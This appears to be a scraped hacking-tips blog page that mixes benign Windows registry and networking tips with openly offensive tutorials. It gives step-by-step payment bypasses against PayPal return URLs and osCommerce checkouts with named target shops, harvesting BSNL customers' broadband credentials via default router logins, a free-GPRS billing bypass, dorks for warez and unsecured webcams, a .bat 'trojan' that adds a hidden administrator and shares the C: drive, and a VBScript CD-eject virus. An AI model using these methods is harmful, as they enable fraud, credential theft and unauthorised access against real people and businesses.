Blacklogic offers you a solution to all your privacy needs with any Internet connection. Their VPN service is a great service to make your appearance on the Internet secure connection and keep your vital information private. Also bypass local internet restrictions with a Strong VPN account, and much more!

Basically, a VPN is a private network that uses a public network (usually the Internet) to connect remote sites or users together offering Anonymous Surfing. Instead of using a dedicated, real-world connection such as leased line, a VPN uses “virtual” connections routed through the Internet from the company’s private network to the remote site or employee.

In this article, you will gai­n a fundamental understanding of VPNs, and learn about basic VPN components, technologies, tunneling and security.

VPN works by using the shared public infrastructure while maintaining privacy through security procedures and tunneling protocols such as the Layer Two Tunneling Protocol (L2TP).

In effect, the protocols, by encrypting data at the sending end and decrypting it at the receiving end, send the data through a “tunnel” that cannot be “entered” by data that is not properly encrypted.

An additional level of security involves encrypting not only the data, but also the originating and receiving network addresses.
If you are tired of nonworking and slow proxies it`s time to start using VPN service.
Key Benefits of anonymous VPN:
* Fast speed
* No need to check regularly (as proxy).VPN servers are available all the time
* Absolute anonymity
* PPTP VPN Service
* No provider logs
* Encrypted PPTP VPN
* Encrypted IPSEC VPN
* 100% content encryption.
* Anonymous surfing
* Personal VPN for anonymous surfing

All traffic leaves one of their given servers with the same IP address. All the traffic of many users becomes mingled together inseparably. Now when traffic leaves the connection it also has a session id number associated with it so when the traffic gets answered or returned the server can route it back to the correct user. The session id has an internal IP addresses for the user and these internal IP addresses are variable and change frequently during the day.

Happy surfing!

Safely editing registry

Windows XP has a vast number of configuration dialogs, but some adjustments can be performed only by directly editing the Registry. Frequently, tips involving Registry tweaks include stern warnings to back up the Registry before making any change. The Windows XP Backup applet can back up the Registry along with other elements of the System State, but the resulting data file can occupy hundreds of megabytes. You're better off saving a system restore point each time you're about to edit the Registry. Better still, you can use Regedit to back up only the Registry keys that will be changed.

Click on Start | Run and enter Regedit to launch the Registry editor. To back up an individual key you plan to edit, navigate to the key and right-click on it. Choose Export from the menu, and save the key to a REG file. Open the REG file in Notepad and insert a few comment lines that describe the source and purpose of the tweak. (To create a comment line, simply put a semicolon at the start of the line.)

Now go ahead and make all the changes to Registry keys and values specified by the tip you're applying. Any time you add a new key or value, make a note of it with another comment line in the REG file. When you're done, save the REG file and close Notepad.


If later you want to undo this Registry tweak, just double-click on the REG file and confirm that you want to add it to the Registry. This will restore any deleted keys or values and will restore the original data for any values whose data was changed. Note that this will not remove new keys or values that were added; that's why you need to make comments about such changes.

Right-click on the REG file and choose Edit, which will open it in Notepad. Check for comments about keys or values that were added, and if you find any, use Regedit to delete them. You can delete the REG file itself once you've completed this process

"Send to" Shortcut for Notepad

This trick shows you how create a "Send To" shortcut called "Notepad".

A "Send To" shortcut is one that when you right-click on a file or folder, you'll see an option called "Send To". This provides you a quick way to open files/folders or perform an action with the selected file/folder.

Many times, you have a text file or any other file which you know exactly contains just plain text. And the file can be viewed just by notepad - The most simple Windows Text Editor, available on any Windows machine. If you are in this situation often, you might have found that it is painful that you'll have to launch Notepad everytime and browse to the file to open it. A simple shortcut would be very helpful.


Here's what you'll get

Use this trick at your own risk.


Here's how

  1. Point your mouse to the "Start" button and right-click. This will bring up a shortcut menu as follow:


  2. Select "Explore" to open the "Windows Explore". Once the "Windows Explore" is opened, the default path is your own profile "Start Menu".


  3. Select "SendTo" right above the "Start Menu". The right panel should display the current Send To shortcuts.


  4. Right-click on the right panel, and select "New" then select "Shortcut".


  5. On the "Create Shortcut" window, type in "notepad.exe" for the box "Type the location of the item", then click "Next".


  6. On the next window, type in "Notepad" for the box "Type a name for this shortcut", then click "Finish".


  7. Done! try this new thing out by selecting a text file, right-click on it and select "Send To". You'll see the option "Notepad" there, which will open the text file with Notepad.

Reset Windows Password

Forgot your administrator password? This page provides step-by-step how to reset your local Windows password. This only works for local user accounts, however, not domain accounts.

The password recovery tool from this page is written by Petter Nordahl-Hagen, and the original information, as well as the downloadable tool, can be found from his website. Per author's information, this tool should work for Windows NT/2000/XP/Vista.

WARNING! Users who have EFS encrypted files on the Windows XP or Vista computers will loose access to the EFS encrypted files after recovery of your password.

The tool can be downloaded here. With this tool, you should be able to reset your local administrator password in case you lost your password and cannot logon to Windows again.

Use this trick at your own risks

I. Download the bootdisk:

1. Download the bootdisk, which includes the password recovery tool here. The file contains the ISO CD image.
2. Unzip the ISO file and burn the ISO file to a CD. Note that this is an ISO file, you must burn it to CD as an ISO image, not a normal files. To find out how, click here.


II. Understanding the process:

* You'll use the bootdisk created from the above steps to bootup your computer, which you want to reset your administrator password.
* You'll be asked for things like: which drive is the boot drive, which path to the SAM file, etc.. but don't worry, detailed information will be provided.
* Once you have selected an account to reset the password, you'll need to type in a new password; however, it is highly recommended to use a BLANK password at this point, then you can change your password later in Windows.
* Follow the prompts to the end. You'll need to save the changes at the end!



III. OK! Enough talking. Let's get started:

1. Startup your computer with the bootdisk created above. You should see a welcome screen following with a prompt:

boot:


2. Just wait, the bootup process will continute automatically. Then you should see a screen similar to this:

=========================================================
. Step ONE: Select disk where the Windows installation is
=========================================================
....
NT partitions found:
1 : /dev/sda1 4001MB Boot
2 : /dev/sda5 2148MB

Please select partition by number or
a = show all partitions, d = automatically load new disk drivers
m = manually load new disk drivers
l = relist NTFS/FAT partitions, q = quit
Select: [1]


3. Notice the last line "Select: [1]" contains the [1] as default since the tool detects the bootup partition is [1]. This might be different on your own machine, but double-check with the information shown under "NT partitions found:", the partition with the word "Boot" should be selected.

4. Hit Enter if the default partition is correct, or enter the number for the boot parition then hit Enter. Here's what you should see next:

=========================================================
. Step TWO: Select PATH and registry files
=========================================================
....
What is the path to the registry directory? (relative to windows disk)
[windows/system32/config] :


5. Notice the last line "[windows/system32/config]" contains the default path, which was detected by the tool. If the path is correct, hit Enter, or if you wish to enter a different path, enter it now and hit Enter.
Here're the paths for different versions of Windows:
- Windows NT 3.51: winnt35/system32/config
- Windows NT 4 and Windows 2000: winnt/system32/config
- Windows XP/2003 (and often Windows 2000 upgraded from Windows 98 or earlier): windows/system32/config

6. Once you hit "Enter" the following similar information should display:

-r-------- 1 0 0 262144 Jan 12 18:01 SAM
-r-------- 1 0 0 262144 Jan 12 18:01 SECURITY
-r-------- 1 0 0 262144 Jan 12 18:01 default
-r-------- 1 0 0 8912896 Jan 12 18:01 software
-r-------- 1 0 0 2359296 Jan 12 18:01 system
dr-x------ 1 0 0 4096 Sep 8 11:37 systemprofile
-r-------- 1 0 0 262144 Sep 8 11:53 userdiff

Select which part of registry to load, use predefined choices
or list the files with space as delimiter
1 - Password reset [sam system security]
2 - RecoveryConsole parameters [software]
q - quit - return to previous
[1]


7. Hit "Enter" with the default option selected "[1]". You'll get the next prompt similar to this:

=========================================================
. Step THREE: Password or registry edit
=========================================================
Loaded hives:

1 - Edit user data and passwords
2 - Syskey status & change
3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] -> 1



8. Hit "Enter" with the default option selected "[1]". You'll get the next prompt similar to this:

===== chntpw Edit User Info & Passwords ====

RID: 01f4, Username:
RID: 01f5, Username: , *disabled or locked*
RID: 03e8, Username: , *disabled or locked*
RID: 03eb, Username: , *disabled or locked*
RID: 03ea, Username: , *disabled or locked*

Select: ! - quit, . - list users, 0x - User with RID (hex)
or simply enter the username to change: [Administrator]



9. Hit "Enter" with the default option selected "[Administrator]", or select another user account. Here you can enter the full user account with < >, CASE-SENSITIVE, or enter the RID number (i.e. 0x1f4). Assuming you select the Administrator account, here's what you should see:

RID : 0500 [01f4]
Username: Administrator
fullname:
comment : Built-in account for administering the computer/domain
homedir :

Account bits: 0x0210 =
[ ] Disabled | [ ] Homedir req. | [ ] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account | [ ] NMS account |
[ ] Domain trust ac | [ ] Wks trust act. | [ ] Srv trust act |
[X] Pwd don't expir | [ ] Auto lockout | [ ] (unknown 0x08) |
[ ] (unknown 0x10) | [ ] (unknown 0x20) | [ ] (unknown 0x40) |

Failed login count: 0, while max tries is: 0
Total login count: 3

* = blank the password (This may work better than setting a new password!)
Enter nothing to leave it unchanged
Please enter new password: *



10. At the prompt "Please enter new password", Enter the * for a blank password (HIGHLY RECOMMENDED!) then press Enter

Please enter new password: *
Blanking password!

Do you really wish to change it? (y/n) [n] y



11. At the prompt, type in "y", then press Enter. Note that the default option is "n".

Do you really wish to change it? (y/n) [n] y
Changed!

Select: ! - quit, . - list users, 0x - User with RID (hex)
or simply enter the username to change: [Administrator] !



12. Enter the "!" to go back to the main menu. Then select "q" at the following menu to quit:

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives:

1 - Edit user data and passwords
2 - Syskey status & change
3 - RecoveryConsole settings
- - -
9 - Registry editor, now with full write support!
q - Quit (you will be asked if there is something to save)

What to do? [1] -> q



13. A prompt to save changes displays, enter "y" to save:

=========================================================
. Step FOUR: Writing back changes
=========================================================
About to write file(s) back! Do it? [n] : y



14. Last of all, the changes saved. The following is what you should see, press Enter, and reboot your computer.

Writing sam

***** EDIT COMPLETE *****

You can try again if it somehow failed, or you selected wrong
New run? [n] : n

Output Text from Dos Prompt to File

This is a small trick that many Dos users might already know. The trick just shows you how to run a Dos command and instead of displaying the outputs on the screen, it saves the outputs into a file.

This trick is very helpful when you want to save the result of a dos command to a file to email it or read/print it later. For example, you can print out your network configuration data and email it to a technical support.


Here's how

simply put a ">" and the destination file at the end of the dos command. Examples:

This command outputs the IP configurations to the file "ipdata.txt" in "C" drive:

ipconfig /all > C:\ipdata.txt

This command outputs the "Path" configurations to the file "pathdata.txt" in the floppy drive "A":

path > A:\pathdata.txt

This command outputs help text of the command "copy" to the file "copyhelp.txt" in "C" drive:

copy /? > C:\copyhelp.txt

Protect your identity

Like many other audio players, Windows Media Player rushes out to the Internet to find information for you when you play a CD. Some of this information, such as song titles and album art, is useful, but Media Player also identifies your copy of Media Player to the site where it's getting data. Why? According to the help file, "The server uses this unique identifier to monitor your connection. By monitoring your connection, the server can make adjustments to increase the playback quality and to alert you about events that occur when receiving streams over the Internet."
If you're disturbed by this exchange of information, here's how to stop it. In Windows Media Player, click Tools > Options and go to the Player tab. Notice the option that says "Allow Internet sites to uniquely identify your player?" Turn it off.

How to Install the Netbeui Protocol on a Windows XP-Based Computer

This article describes how to install the NetBEUI protocol on a Windows XP-based computer. This may be useful because the NetBEUI protocol is not included in the list of installable protocols in Windows XP even though the files that are needed to install the protocol are included with the installation CD-ROM. It is important to note that the NetBEUI protocol is not supported on Windows XP.
The Netnbf.inf and Nbf.sys files are the files that are needed to install the NetBEUI protocol. To install the NetBEUI protocol:
  1. Click Start, click Control Panel, and then double-click Network Connections.
  2. Right-click the adapter you want to add NetBEUI to, and then click Properties.
  3. On the General tab, click Install.
  4. Click Protocol, and then click Add.
  5. Click Have Disk, insert your Windows XP CD-ROM, open the Valueadd\msft\net\netbeui folder, click the Netnbf.inf file, and then click Open.
  6. Click OK, and then click OK to complete the installation.

Stop the automatically rebooting after Windows Updates !!

Normally Windows Update will automatically reboot the system when you have your system configured to "Automatically download recommended updates for my computer and install them" and one or more of those updates requires a reboot. This settings changes the behavior so when users are logged in the system will not automatically reboot.

Open your registry and find or create the key below.
Go here [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]

Create a new DWORD value, or modify the existing value, called "NoAutoRebootWithLoggedOnUsers" and set it (0 = no effect, 1 = do not automatically reboot)

Exit your registry; you may need to restart or log out of Windows for the change to take effect.
and you are done .!!

Some Registry Tricks !!

Add Open With to all files

You can add "Open With..." to the Right click context menu of all files.This is great for when you have several programs you want to open the same file types with.

1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\*\Shell
3. Add a new Key named "OpenWith" by right clicking the "Shell" Key and selecting new
4. Set the (Default) to "Op&en With..."
5. Add a new Key named "Command" by right clicking the "OpenWith" Key and selecting new
6. Set the (Default) to "C:\Windows\rundll32.exe shell32.dll,OpenAs_RunDLL %1", C:\ being your Windows drive. You must enter the "OpenAs_RunDLL %1" exactly this way.



Customize the System Tray

You can add your name or anything you like that consists of 8 characters or less. This will replace the AM or PM next to the system time. But you cannot do this if you are using any of our software during the trial period; it will corrupt the trial license.

1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Control Panel\International
3. Add two new String values, "s1159" and "s2359"
4. Right click the new value name and modify. Enter anything you like up to 8 characters.

If you enter two different values when modifying, you can have the system tray display the two different values in the AM and PM.

LockOut Unwanted Users

1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Network\Logon
3. Create a dword value "MustBeValidated"
4. Set the value to 1
This forced logon can be bypassed in Safe Mode

Disable the Outlook Express Splash Screen


1. Open RegEdit
2. Go to HKEY_CURRENT_USER\Software\Microsoft\OutLook Express
3. Add a string value "NoSplash"
4. Set the value data to 1 as a Dword value

Multiple Columns For the Start Menu

1. Open RegEdit
2. Go to the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Explorer\Advanced
3. Create a string value "StartMenuScrollPrograms"
4. Right click the new string value and select modify
5. Set the value to "FALSE"

Changing Windows' Icons

You can change the Icons Windows uses for folders, the Start Menu, opened and closed folder in the Explorer, and many more.

1. Open RegEdit
2. Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Explorer\Shell Icons
3. Add a string value for each Icon you wish to change.
Example: "3" ="C:\Windows\Icons\MyIcon.ico,0" This will change the closed folders in the Explorer to "MyIcon.ico". Here is a complete list for each value.
0= Unknown file type
1= MSN file types
2= Applications Generic
3= Closed Folder
4= Open Folder
5= 5.25" Drive
6= 3.25" Drive
7= Removable Drive
8= Hard Drive
9= NetWork Drive
10= Network Drive Offline
11= CD-ROM Drive
12= RAM Drive
13= Entire Network 14= Network Hub
15= My Computer
16= Printer
17= Network Neighborhood
18= Network Workgroup
19= Start Menu's Program Folders
20= Start Menu's Documents
21= Start Menu's Setting
22= Start Menu's Find
23= Start Menu's Help
24= Start Menu's Run
25= Start Menu's Suspend
26= Start Menu's PC Undock
27= Start Menu's Shutdown 28= Shared
29= Shortcut Arrow
30= (Unknown Overlay)
31= Recycle Bin Empty
32= Recycle Bin Full
33= Dial-up Network
34= DeskTop
35= Control Panel
36= Start Menu's Programs
37= Printer Folder
38= Fonts Folder
39= Taskbar Icon
40= Audio CD

Now Restart your Computer..

BSNL hack for Internet

Free gprs in bsnl

here are the steps to perform:-

Logic: the server has a major bug in it, by which it fails to block two simultaneous connections from the phone and establishes a connection with full internet working,

Supported devices: all phones with multichannel gprs support

For connection on your mobile phone:-

1) Make two connections like bsnlportal and BSNLPORTAL1

(names of profile don’t matter, u can keep one as billgates and shahrukhkhan lol..the basic purpose of names is to enable the user to differentiate between the two accounts,)

2) Select the application you got to have the full connection working on.
Surpassingly “web” now just select “bsnlportal” profile and select a link like wap.cellone.in the page will get open, just press the red button such that the “web” application goes in the background.
Make sure that the gprs connection is still established with the web app. Two parallel lines on the top left of the screen will confirm this

3) Now open any other app that requires web connection like opera. Select BSNLPORTAL and open any other link like wap.google.com, u will get error –

the aim of using the other app is to perform multi-channel gprs,
this is verified by seeing some dots on the pre-existing connection established by “web”

(step 2)

“Access denied.

Technical description:
403 Forbidden - You are not allowed to communicate with the requested resource.”

4) close opera and open web and open a site like esato.com

5) if everything is done as said here then esato will load and voila! We have the whole internet!

For connection on pc.

1)create a connection and enter the number to be dialed as *99***1#

2) enter the following string as extra initialization command

3)now dial from pc, the connection will be established

4)pick the phone and open “web” open “wap.cellone.in” the phone shows error .

5) close “web” and then from the browser open www.google.com
and voila! The whole intenet is here

settings for profiles

apn: celloneportal
ip: 192.168.51.163
port : 8080

leave other fields blank as they are of the least concern!

the browser settings on pc too go the same as mentioned above!

Hacking Bsnl Broadband Accounts

Disclaimer : The information provided below is for educational purpose only. The author is not responsible for any misuse of the information and discourages any illegal use of it.

Bsnl DataOne Broadband continues to grow as one the most popular broadband services in India with high speed facilities of upto 2 mpbs. But a large number of users of this service are vulnerable to hacker attacks because discovering and hacking the vulnerable victims of this network is shockingly simple. If you are a Bsnl Broadband user then immediately assess the security of your internet connection and take appropriate steps to secure yourself.

First lets see how simple it is to hack bsnl dataone broadband usernames and passwords. For this you shall need a ipscanner tool called Angry IP Scanner http://www.angryziber.com/ipscan/ or anything similar.

Ok so lets begin... Get your IP from :
www.ipmango.com


Step 1 : Start Angry IP scanner and goto options > ports. Type in 80 in the first ports textbox and click ok.
Then goto options > options ; in the display section select "only open ports" and click ok&save.

Now on the main screen put in the ip scan range as something 59.*.0.0 - 59.*.255.255 (for e.g. 59.95.2.3) and click the start button. And the list that shall follow next are the victims. In this example we choose the range 59.95.0.0 - 59.95.255.255. You will be surprised at the number of victims you discover.

Step 2 : Pick the ip-address of any of them and open up your browser and type in http://59.*.*.* (the * should be replaced by the values from the ip you are using. A box will popup asking for username and password. Enter the username : admin and password : admin .There is a high chance that you will be able to login with that username and password.
admin-admin is the default username and password that is set while manufacturing the adsl modem devices.

What follows next is the modem administration panel.
Simply search for the "WAN" option and click it. On the next page you will find the username and password of that user. now right-click on the page and click view source. in Mozilla/Opera This frame -> view frame source

Now in the source code search for this : INPUT TYPE="PASSWORD"

and the value field of this input element will have the password

if its not there as in case of D-Link DSL 502T ADSL Routers the search for this

input type="hidden" name="connection0:pppoe:settings/password" value="password" id="uiPostPppoePassword"

and the value field will have the password
Well each steps take less than 1 minute so getting username passwords wont take even 2 minutes and is easier than sending a mail.

And this exposes the weak security of bsnl broadband users.

Well this is not a weakness but more of a mis-configuration which leads to insecurity. If you understand networking then you would probably realise that it was merely logging into the remote administration service of the modem and nothing else. This was not really hacking but a simple search of victims who are absolutely ignorant of their weak security on the internet.

Most routers have an option where remote management can be disabled. In other words, you can only connect to the configuration interface from the internal network, not the WAN(Internet) side. You would definitely want to make sure remote management is not active to protect yourself.

Note : On SmartAX MT880 eventhough Remote Management is disabled , it permits remote logins from over the Internet. So change your mode administration passwords immediately.

The problem is that the professionals at Bsnl are ignorant of such simplicity of networking and unable to advise the users or guide them to take proper security measures leaving their customers and themselves absolutely unsecure.

Now lets check a few more options related to this issue. A bsnl broadband modem can be used in two modes. RFC Bridged mode and pppoe mode.

In the RFC Bridged mode the device behaves like a modem device that is attached to your computer and you use some dialup software to dial into the isp through this modem.This is PPPOE from the PC and the adsl device is a good modem. This mode is safer as the username password are on your pc and nothing is on the modem.

In the PPPOE mode the adsl device becomes a router - a distinct network device with many features enabled. In this mode the username password is stored in the modem which will dial to the isp and establish the internet connectivity. The computers will just connect to this router who would be their primary gateway. Now this is the mode where the risk exists.

If remote administration is enabled the remote users from the internet can login to this modems administration panel. Now the main problem is the default admin username-password which most users dont change due to ignorance. "admin-admin" is pair that works in most cases giving you full access to the modems internals. What follows next is simple as drinking a glass of orange juice.

Many users install firewalls and think they are safe, but they fail to understand that the firewall protects their PC not the "router" since the topology is like

(PC) -> router -> internet

So how should you secure yourself ?

1. Use RFC Bridged mode if it is sufficient for you.

2. Change the default admin password of your modem.

3. Disable wan ping reply . ( this will prevent the hackers from directly discovering your pc when it is on the internet)

4. Disable remote configuration feature.

5. Check your broadband usage on a regular basis and compare it with your own surfing schedules to check whether someone else has used it or not. If suspiscious usage is indicated then immediately change your bband password as well. Or a better suggestion would be to change broadband passwords on a regular basis.

Try to spread the security awareness to your friends and other relatives who are using Bsnl broadband and encourage them to secure their internet connectivity.

Disclaimer : The information provided above is for educational purpose only. The main purpose of the author is to spread awareness amongst users. The author is not responsible for any misuse of the information and discourages any illegal use of it.

hack those sites which link with PAYPAL- education purpose only

How to hack PayPal sites or how to download applications free from PayPal sites....U just
need to know a bit of HTML anyone want to download any application from da sites which r containing PayPal order page & a link to start...

First off all u need to hide ur ip-address use a proxy server otherwise ur ip address will be recorded in some sites click here to hide ur ip-address.

1) Rightclick your mouse (ctrl+click) viewsource and open the source of the site in an a texteditor
2) Search for the word "return"
3) Next to it you can find the url for the thank you page
4) Copy the url and paste it in your browser and you will see the download link

This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.

You can try it here to start with:
Code:
http://www.ramphelp.com/halfpipe.html


About half way down the page you will find:< type="hidden" name="return" value="http://www.ramphelp.com/65984523/thanks/68912h
p654/26865thankyouhp08363215423.html ">

Copy the link into your browser and download.

change ip address

. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

P.S:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

find out from where u get email

When you recieve an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.



First of all, the IP address is generally found in the headers enclosed beween square brackets, for instance, [129.130.1.1]
Finding IP address in Gmail

1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the email headers,

* Click on the inverted triangle beside Reply. Select Show Orginal.

4. manually find the IP address, proceed to 5.
5. Look for Received: from followed by the IP address between square brackets [ ].

Received: from [69.138.30.1] by web4587.mail.***.yahoo.com

6. If you find more than one Received: from patterns, select the last one.
7. Track the IP address of the sender

hack google for download music

Great Tip For Mp3 Searching On Google,

go to google copy and paste in

?intitle:index.of? mp3


and after mp3 put in an artist or album or whatever and hit enter... what you get is lists of downloadable mp3s

eg:


?intitle:index.of? mp3 santana



Another trick:

Use the following


inurl:microsoft filetype:iso


You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…


Another trick:


http://www.google.com/ie?q=parent-directory+"Warez"+exe+OR+zip+OR+rar+OR+gzip+OR+tar+OR+bzip&num=100


Replace "Warez" with "Gamez" "Mp3" anything you like....

How to increase the processor power of your computer?

Follow the given steps to end the idle tasks:

*

To enable this feature, you will need to be logged into your computer with administrative rights.
*

Click Start button and click on Run option.
*

In the Run box, type the command Rundll32.exe advapi32.dll,ProcessIdleTasks command and press Ok button.

Here system will take some time to end the background idle tasks

Can I configure the Windows XP/2000/2003 Recovery Console to auto-logon whenever I run it?

By doing this, any user can gain access to your computer by using the Recovery Console and without being prompted for an administrative password.

To set an automatic administrator logon for the Recovery Console, complete the following steps while you are logged on with administrative privileges:

1.

Double-click Administrative Tools in Control Panel, and then double-click Local Security Policy.
2.

Expand Security Settings , expand Local Policies, and then click Security Options . Locate the “Recovery Console: Allow automatic administrative logon” policy. Double-click this policy, and then set it to “Enable”.
3.

Close the snap-in. The policy is effective immediately. Be sure to go back into the Local Security Policy snap-in to make sure that the effective setting for the policy is “Enabled”.

The next time you boot to the Recovery Console, you won’t be prompted for a password.

HACK IN TO WEB CAMS

it is so easy
Go to WWW.GOOGLE.COM and PUT THIS IN SEARCH BAR
inurl:/view/index.shtml
or intitle:liveapplet
or inurl:lvappl
and click on search, it show a list of searched items. go to an linksome of them don't work. but some work. u will see street/traffic and not only this.
u can also movethem right or leftor zoom in or zoom out........
its kind of fun
NOTE: u should have a high speed internet connection for this.

make ur own online radio channel

Must HAVE Winamp (Any Version)::

First, things First your speed has to be at least 256/64 kbps (which means Dial-up users, will have alot of latency, just dnt bother)

Second, your going to have to have a domain, an updated one with the current i.p active. (Could be anything e.g. My sig)

Now, Your gonna have to download the Shoutcast Files.

Go to
:
www.shoutcast.com

to get the files.

Ok After downloading these, installing Both of them in any order i dnt care. Go to START>PROGRAM FILES>SHOUTcast DNAS>EDIT SHOUTCAST DNS CONFIG.

Ok your gonna have to Configure it:
Go Down and where it says password: change (that means your gonna have to change it to whatever, make sure u remember)

The Portbase: change it to whatever port you want it
Maxusers: (lets be realistic here, dnt put in 10000, like NXS's radio station) your bandwidth has to be extremely good, if your cable, 50 user max is ok, ADSL should stay below 10 users, and T1 connections should do whatever tickles there fantasy.

EDIT>SAVE.

Open winamp, RIGHT CLICK>OPTIONS>PREFRENCES>DSP EFFECT> and choose the NULLSOFT SHOUTCAST.

Go to OUTPUT, and then click on Connection, Through the ADDRESS, type your address which you have done through
Code:
www.no-ip.com

PORT NUMBER, whatever u did in the EDIT.txt, and your password.

Then go to Encoder, and choose your quality of your music. Go back to OUTPUT>OUTPUT CONFIG> YELLOW PAGES. this is your advertisemant information. dow hatever you like there.

Now Connect. to check that your Radio os on-line go to http:// (your address that you added in the prefrence)
Related Video

Making your own trojan in a .bat file

Open a dos prompt we will only need a dos prompt and windows xp operating system

-Basics-

Opening a dos prompt -> Go to start and then execute and type
cmd and press ok

Now insert this command: net
And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

In this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and write there:

dir
pause

And now save this as test.bat and execute it.
Funny ain't it ?

---------------------- Starting -------------------
-:Server:-

The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open your dos prompt and a notepad.
The dos prompt will help you to test if the commands are ok
and the notepad will be used to make the .bat file.

Command #1-> net user prudhvi /add
What does this do? It makes a new user called prudhvi you can put
any name you want

Command #2-> net localgroup administrators prudhvi /add
This is the command that make your user go to the administrators
group.

Depending on the windows version the name will be different.
If you got an American version the name for the groups is Administrators and for the Portuguese version is administrators so it's nice you know which version of windows xp you are going to try share.

Command #3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your .bat file and send to your friend.
-!extras!-
Command #4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim opens the .bat it will send a message to your computer and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

-----------------------: Client :----------------
Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user.First we need to make a session with the remote computer with the net use command,you will execute these commands from your dos prompt.

Command #1 -> net use \\victimip neo
This command will make a session between you and the victim.Of course where it says victimip you will insert the victim ip.
Command #2-> explorer \\victimip\system
And this will open a explorer windows in the share system which is the C:/ drive with administrators access!!!

Have Fun !!!!

CD rom virus code

cd rom virus code:
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


its my own creation frns, try it, paste it in notepad and save it as anyfilename.vbs, remember .vbs extention is must. then dbl clk it and see.....

PAYPAL HACKS....EDUCATIONAL ONLY

PAYPAL HACKS....EDUCATIONAL ONLY

Actually in this tutorial I will not show you to hack paypal accounts or anything but I will show you how to get some things which we do not need to pay for this and we can easily get that things without purchase

So first of all I will let you know that it is not working with only Paypal but most of payment processor like egold,moneybooker and other countless...

Now to test this we are going to find one shoping cart script that have inbuilt problem and we can buy stuffs from the store which is using this script. Script name is "osCommerce"

to find stores which is using osCommerce we will use Google

Lets find some eBooks

Google DORK : ebooks + inurl:index.php?cPath=

Enter this in Google and you will have the list of sites whch is using this script

Now go to that sites and look at their product and look weather Format is Instant Download or what

likeTo test this one Go to this site http://www.adbie.com/ and add that products to your cart one bye one as many as you want and then go to checkout, They will ask you to register so register there fake account. and then Choose "Paypal" as payment method.

When you see paypal payment page then return this url like http://adbie.com/checkout_process.php and you done. Scroll down and download your product

You can use that Google d0rk to find such sites whch are using this script. It will work even if there is another methods like egold or moneybooker.

Note : This tutorials is for educational purpose only, You must know what you are going to do with it.. This is 100% illegal.

Now even if you the above mentioned paypal hack already.... what you don't know is the name of the website which deals with mobile applications and softwares in which the above trick can be used.
This hack can be used in the following site.

http://www.mobilesoftmarket.comLIST OF SITES WER DIS HACK CAN BE USED......

http://www.white-wolf.com/
http://www.treasurebook1.co.uk
http://www.wildix.com/
https://www.novapublishers.com/
But MIND YOU TAKE ONLY DOWNLOADABLE PRODUCTS SUCH AS EBOOKS AND SOFTS......ALSO USE PROXIES....
U CAN TEST THIS METHOD ON THIS SITE also.......

www.nilashop.com

JUS RETURN THS URL WEN U SEE PAUPAL PAYMENT PAGE..

http://www.nilashop.com/checkout_process.php

its working....

How to Hide in the (Network) Neighborhood

Don't want your XP computer to show up in the network browse list (Network Neighborhood/My Network Places) to other users on your network? One way to accomplish that is to disable file sharing. To do this, click Start, right click My Network Places and select Properties. Right click your local area connection and click Properties. Uncheck the box that says File and Printer Sharing for Microsoft Networks. Click OK.

But what if you want to be able to share folders with some users; you just don't want everyone on the network to see your computer's shares? There's a way:

Click Start and select Run.
In the Run box, type net config server /hidden:yes
Click OK.
Now others who know the UNC path (\\computer name\share name) can connect to your computer's shares from the Run box, but it won't show up in the network browse list.

Free Access To Websites Without Registering

Go to

-http://bugmenot.com/

and type the URL of the website you want to log into.
Examples:

